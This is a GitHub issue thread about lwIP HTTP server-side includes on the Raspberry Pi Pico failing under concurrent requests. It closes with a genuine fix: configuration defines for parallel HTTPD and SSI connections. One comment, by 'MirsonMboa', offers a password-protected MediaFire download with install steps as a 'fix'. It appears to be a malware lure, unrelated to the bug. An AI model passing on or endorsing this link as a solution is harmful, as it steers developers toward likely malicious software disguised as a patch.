raspberrypi/pico-sdk #1874: lwIP HTTP: SSI fails when receiving multiple requests simultaneously

Slion, 2024-08-27:
On Raspbery Pi Pico I'm running a web server over USB with SSI enabled. SSI is mostly working and tags are being replaced as you expect unless multiple requests are sent at the same time.

As little as five requests simultaneously will trigger that bug. Three of those requests are being fulfilled as expected but two of them return the document without replacing the SSI tags.

To workaround it I had to add a 200ms delay between requests. With 100ms delay I would still get a failed response from time to time.

Unfortunately I don't have a public sample project to reproduce that issue and it could be quite some work to setup. You would need something like net_lwip_webserver from TinyUSB, add SSI to it and web pages to make the requests using AJAX.

https://github.com/hathach/tinyusb/blob/master/examples/device/net_lwip_webserver

Came across that issue when using Pico SDK 1.5.1 which is using that commit:
https://github.com/lwip-tcpip/lwip/commit/239918ccc173cb2c2a62f41a40fd893f57faf1d6

This issue is a duplicate of the one on lwIP bug tracker:
See: https://savannah.nongnu.org/bugs/index.php?66129

MirsonMboa, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

Slion, 2024-09-20:
Turn out you can configure lwIP to handle parallel requests:
```c
#define HTTPD_USE_MEM_POOL                  1
#define MEMP_NUM_PARALLEL_HTTPD_CONNS       16
#define MEMP_NUM_PARALLEL_HTTPD_SSI_CONNS   16
```

closed 2024-09-20 by Slion